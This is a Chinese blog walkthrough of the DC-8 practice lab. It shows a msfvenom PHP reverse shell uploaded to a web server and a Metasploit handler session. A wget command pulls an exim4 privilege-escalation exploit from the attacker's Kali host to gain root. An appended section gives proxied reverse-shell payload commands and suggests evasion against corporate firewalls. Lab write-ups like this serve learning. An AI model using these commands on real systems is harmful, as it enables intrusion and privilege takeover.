关于DC8用MSF进行反向链接的一些说明

本文讲述了如何使用MetasploitFramework(MSF)生成的反向链接在Web服务器上实施攻击,包括PHP代码上传、木马后门、提权到exim4文件夹并利用其漏洞,最终通过wget在KaliLinux上执行命令并获取root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

上星期五的时候得了甲流,关于MSF反向链接的地方没有写明白

现在重新写一下

当时我们用msfvenom生成了反向链接的代码

如图所示

注意这个生成的后门我们的lhost地址是我们kali攻击机的地址,

然后将这个代码复制到网页上传点的的时候休要注意可以上传的是不是PHP的代码

必须是PHP代码能够上传才行

然后进入msf进行连接的时候

需要先进入辅助模块

use multi/hander

辅助模块,

然后指定的链接lhost地址也是kall攻击机的地址

set lhost为192.168.52.129

然后记得在网页上登陆账号才能把木马后门上传

然后木马后门链接成功进行反弹

输入shell进行shell的指令

然后进入shell指令界面

输入id可以看到

是www-date

输入常用提权指令

用find / -user root

然后我们发现这有一个文件夹叫做 exim4

他是一个电子邮件 但是它具有管理员权限

让我们观察一下

这个的版本号 

然后我们可以通过searchsplot工具去搜索这个版本的漏洞

发现存在漏洞

让我们把这个病毒的路径调出来

然后复制一份放到桌面上

让我们查找一下这个漏洞的利用路径

复制成功

这时候我们在kali攻击机上启动一个临时的http链接窗口

将文件上传上去

切记 只有进入/tmp目录才上传文件

用wegt

输入方式为为 /tmp wget http:、、192.168.52.129:80、46996.sh

如图所示为连接上传成功

查看权限

查看上传文件的用法

我们将使用第二种提权用法

进入root权限了

切换到 /roort目录自己看就行了

### 配置Metasploit Framework (MSF) 使用代理实现反向连接 为了使 Metasploit Framework 能够通过代理执行反向连接,需调整 payload 设置并配置 MSF 的网络选项。具体方法如下: #### 1. 创建带有代理设置的有效负载 当创建用于反向连接的有效负载时,在 `msfvenom` 中加入 HTTP 或 SOCKS5 代理参数。 对于 Java Web 应用程序(WAR 文件),可使用以下命令来生成经过代理转发的 Payload[^3]: ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your_IP_Address> LPORT=<Your_Port_to_Connect_On> Proxies=http://<Proxy_Host>:<Proxy_Port>/ -f war > shell.war ``` 此命令指定了一个 HTTP 代理服务器地址作为中间节点,有效负载将尝试经由该代理建立回连通道。 #### 2. 在 Metasploit 控制台内启用代理支持 启动 Metasploit 并进入控制台环境后,可以通过设定全局变量或特定模块选项的方式开启代理功能[^4]: ```ruby setg http_proxy http://<Proxy_Host>:<Proxy_Port> setg https_proxy http://<Proxy_Host>:<Proxy_Port> ``` 上述指令设置了整个框架层面的 HTTP(S) 请求都将被路由至指定的代理服务器上处理。 针对具体的 exploit 模块,则可以在加载之后单独为其应用代理规则: ```ruby use multi/handler set PAYLOAD windows/meterpreter/reverse_http set LHOST <Your_IP_Address> set LPORT <Your_Listening_Port> set ReverseListenerBindAddress <Local_Bind_Address_for_Proxy> set HttpUsername <Optional_HTTP_Auth_Username> set HttpPassword <Optional_HTTP_Auth_Password> exploit -j -z ``` 这里特别注意的是 `ReverseListenerBindAddress` 参数,它决定了监听器绑定本地哪个网卡接口等待来自代理的数据包;而 `HttpUsername` 和 `HttpPassword` 则是在所使用的代理需要身份验证的情况下才需填写。 #### 3. 处理防火墙和安全设备过滤 考虑到企业级环境中常见的网络安全防护措施,建议选用具备一定隐蔽性的传输协议如 HTTPS/TLS 来封装通信流量,并考虑采用 Metasploit 提供的各种规避技术以提高成功率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值